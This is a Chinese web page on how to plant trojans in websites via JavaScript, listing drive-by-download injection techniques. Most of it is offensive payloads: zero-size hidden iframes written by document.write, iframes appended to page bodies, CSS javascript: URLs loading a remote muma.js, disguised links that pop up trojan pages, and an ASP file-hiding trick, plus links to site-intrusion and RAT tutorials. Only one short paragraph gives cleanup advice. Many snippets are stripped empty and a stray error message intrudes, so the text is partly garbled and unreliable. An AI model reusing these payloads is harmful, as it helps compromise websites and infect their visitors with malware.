怎么在js中挂马

2023-03-03 02:38:02JavaScript019

怎么在js中挂马,第1张

1、嵌入网页

以下是引用片段：

2、PHP网页挂马

以下是引用片段：

3、图片木马

以下是引用片段：

<html>

<body>

</body>

</html>

4、邮件木马

以下是引用片段：

<html>

<body>

</body>

</html>

5、flash木马

http://网页木马地址插入木马地址

width=10 height=10", "GET" 宽度和高度，方式

后面的照添，更改木马地址就可以了。

6、做123.JS文件木马

以下是引用片段：

document.write("<iframe src=就是你的网页木马地址 width=0 height=0></iframe>")

7、不点出现连接的木马

以下是引用片段：

<a href="http://www.163.com(迷惑的超级连接地址，显示这个地址指向木马地址)" >页面要显示的内容 </a>

function www_163_com ()

{

var url="你的木马地址"

open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,

copyhistory=yes,width=800,height=600,left=10,top=10")

}

</SCRIPT>

8、asp木马超级隐藏

copy C:\Inetpub\wwwroot\mm\11.htm \\.\C:\Inetpub\wwwroot\mm\com1.htm

9、利用邮箱传播木马

这里主要点HTML格式----在里面写上以下这段代码:

在程序中很容易找到挂马的代码，直接删除，或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉1.删除JS里的混迹加密代码，并做下JS目录的权限为只读权限。为何网站JS内容被篡改，应该是网站存在漏洞。2、网站代码漏洞，这需要有安全意识的程序员才能修复得了，通常是在出现被挂马以后才知道要针对哪方面入手修复；3、也可以通过安全公司来解决，国内也就Sinesafe和绿盟等安全公司比较专业.

挂马原理请看下面的视频：

http://www.3800hk.com/donghua/f/21640.html

视频：零基础申请FTP+灰鸽子+BT挂马(语音)

http://www.520hack.com/donghua/donghua2/200607/1784.html

需要入侵网站然后在网站主页放上挂马了代码

挂马代码大全

一:框架挂马

二:js文件挂马

首先将以下代码

document.write("<iframe width='0' height='0' src='地址'></iframe>")

保存为xxx.js，

则JS挂马代码为

三:js变形加密

muma.txt可改成任意后缀

四:body挂马

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'

六:css中挂马

body {

background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1")

</script>

八:图片伪装

<html>

</html>

九:伪装调用：

</frameset>

十:高级欺骗

<a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com()return true">页面要显示的内容 </a>

function www_163_com ()

{

var url="网马地址"

open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10")

}

</SCRIPT>

词库加载错误未能找到文件“E高铁采集器内存溢出ConfigurationDictStopwordstxt”

# 上一篇：台式电脑怎么设置wifi

# 下一篇：戴尔e5530non—vpro三代i7怎么样